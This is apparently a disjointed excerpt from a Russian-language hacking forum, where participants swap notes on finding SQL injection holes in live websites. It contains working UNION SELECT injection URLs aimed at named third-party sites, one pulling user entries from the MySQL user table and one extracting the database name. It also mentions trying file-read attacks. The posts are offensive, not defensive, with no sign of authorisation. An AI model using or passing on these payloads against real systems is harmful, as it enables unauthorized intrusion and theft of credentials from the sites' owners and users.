Separate names with a comma.
Велемир, только твой мат удерживает от того, чтобы добавить тебе репутацию.
Вчера смотрел, они с базой какие-то работы проводили.
Вы правильно думаете. Я в принципе спрашиваю. Насколько понимаю, возможна))
Возможно ли проведение инъекции в такой конструкции: /index.shtml?id=41086 ?
извиняюсь, версию недоглядел..автор, наверно, допустил опечатку...
:( Уже прикрыли. По крайней мере, ошибки синтаксиса уже нет.
да вроде в on.
Нашел инъекцию, не blind, только при следующем запросе...
http://www.jm-hohenems.at/index.php?id=-1+union+select+1,2,3,4,5,6,7,user,9+from+mysql.user--&lang=1'
Да я сам пробовал лоад файл. Увы, не помогло. Спасибо за совет.
http://www.ksu.ru/f16/index.php?id=10&idm=0'&id_news=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11/* Выводит имя базы, пользователя и...
